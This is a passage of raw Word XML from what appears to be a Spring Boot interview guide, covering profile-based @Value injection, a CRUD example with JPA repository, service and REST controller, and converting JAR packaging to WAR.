    <w:p w14:paraId="11C882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ject values from profile-specific properties files into your beans using the @Value annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54345A9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7852F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Value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B707C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558196C" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD406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40ED9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baseService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A9B903" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022B9A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alue("${spring.datasource.url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD32EB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sourceUrl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B3F2E2" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57798E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rintDataSourceUrl() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D668D5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DataSource URL: " + datasourceUrl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1248BC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479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94FCD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activate the dev profile, the URL will be read from application-dev.properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B55EF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708D1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in Spring Boot are a way to create environment-specific configurations and beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1857C0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for each environment in separate property files (e.g., application-dev.properties, application-prod.properties).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C2B6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activate profiles using the spring.profiles.active property and the @Profile annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9999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rofiles help in managing environment-specific configurations and ensure that the right configuration is used for the right environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222C73DB" w14:textId="4CC334B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616" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D39AF5D" w14:textId="315094C4" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00864748">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="635" w:name="_Toc197867849"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will you do CRUD operations using spring boot applications</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="635"/>
    </w:p>
    <w:p w14:paraId="78B03F71" w14:textId="60076F05" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="002C63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hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00970969" w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>o perform CRUD operations in a Spring Boot application, you'll typically follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7ED58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Spring Boot Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D35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by setting up a Spring Boot project. You can either use Spring Initializr (</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="002C6305">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:color w:val="auto"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://start.spring.io/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) or set up the project manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3DB1F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 you might need</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE151A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Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120771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Data JPA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42918E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2 Database (or any other database like MySQL, PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650D142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DevTools (optional for easier development)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC44B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Database Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5474DA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pplication.properties (or application.yml), set up the database connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F6E40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H2 (in-memory database):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1797136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h2:mem:testdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CFF9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h2.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA8A3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sa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A5A0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70759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H2Dialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF0F6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h2.console.enabled=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A30937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495EDE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MySQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D4C7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BF775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4F67C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C3AA39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50A385D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8Dialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C517D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Entity Class (Model)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3D7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ntity class to map to your database table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACEB2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 entity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7693ACA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Entity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5312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Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0009F7FA" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="197AD83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18C45C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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402D5C56" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="273C230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4918BE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559B0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6CDD8A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email;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0A48C0" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479598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11ACDF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5C75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Repository Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52123B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Data JPA to handle database operations. The repository will handle all the CRUD operations for you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207EB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8C40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data.jpa.repository.JpaRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A655EB" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C3AFF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UserRepository extends JpaRepository&lt;User, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6D5C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define custom queries if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5474A1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6C3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provides built-in methods like save(), findById(), findAll(), deleteById(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E5DD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the Service Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7002A1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 service layer is where you put the business logic, interacting with the repository to perform CRUD operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF0EB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87A9F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233556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038A224" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B1211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514F12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196B277" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4976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4BE6C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8E1175E" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4A380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0545E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4FB2902E" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="105217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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385279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saveUser(User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1B0DE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save(user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF103E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2E819D" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B2F4AB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205115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61C33D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All();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0A03A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3ACEAD" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24176E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31F26D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Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C60E2A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ById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE32D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5E205A" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="070BBFD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user by id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB55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Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA94F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Repository.deleteById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0952604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4390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FF04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reate the Controller Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4E7A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handles HTTP requests and interacts with the service layer to perform CRUD operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CC93C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Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484E20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834FA8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237BA58C" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598AAE9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3859DD8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A948717" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0F71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E879D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users")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A5F0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7009974D" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFE55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A237C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4E6082CC" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6786B6E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 a User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3622CF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087B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createUser(@RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221C1F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2BE4B0A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58DB90" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EEC2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Get all Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142110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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538097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073417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AllUsers();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747568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332363" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE1836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697BCD1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4D785C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PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8EDB1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UserById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C777D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F233FF9" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665A2D5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pdate a User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8B3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tMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C722B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updateUser(@PathVariable Long id, @RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398CF4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modify this logic as per your requirements, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9ACF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g., check if the user exists first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211DF0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tId(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14995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59A893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2E4679" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11526E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a User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226C606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leteMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BA1C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PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F509C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deleteUser(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B847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2F8B3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A15E73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ing the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553B72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test CRUD operations using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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A5DD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 POST /api/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013280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 GET /api/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0977E95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 GET /api/users/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583F95B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 PUT /api/users/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5F23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 DELETE /api/users/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE94B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Requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F75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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F2C627"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OST http://localhost:8080/api/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A88C3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2A18608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3C755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1E6D36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5EC1A4E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5E08F8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F01FA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FB9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFE1B0F"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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6560C8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEB0809"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UT http://localhost:8080/api/users/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA01DE1"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6CA72E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9ECFE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Smith",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9A1A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smith@example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FB1EF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9E003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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F55B44"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DELETE http://localhost:8080/api/users/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBB23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523FAA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pring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides a streamlined way to perform CRUD operations using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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F812C0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reate an entity class to map the database table, a repository to handle database queries, a service layer to manage business logic, and a controller to handle HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49826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tandard Spring Data JPA repository interface (JpaRepository) handles the CRUD functionality automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D48205C" w14:textId="6AB28A4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617" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="788BA452" w14:textId="42C8C90E" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00864748">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="636" w:name="_Toc197867850"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to change from JAR to WAR in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="636"/>
    </w:p>
    <w:p w14:paraId="6FB5779C" w14:textId="422D7418"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change your Spring Boot project from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to a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Web Application Archive), follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBA89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pdate pom.xml (for Maven)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523791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using </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Maven</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you need to change the packaging type from jar to war and configure the necessary dependencies to support a web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E66E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ange Packaging Type</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In your pom.xml, change the &lt;packaging&gt; element from jar to war.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A9E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D220C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a Dependency for spring-boot-starter-web</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that you have the necessary dependency for a web application in your pom.xml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E334F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618D9DC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0EA7F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0F2F475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D188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from Spring Boot Starter</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since Spring Boot includes an embedded Tomcat server by default, and a WAR file requires an external servlet container, you need to exclude the embedded Tomcat dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3873A4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77A2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590024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0B46A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45E3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E3473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Spring Boot Maven Plugin Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Make sure your spring-boot-maven-plugin is configured to handle the WAR packaging.</w:t>
      </w:r>
    </w:p>
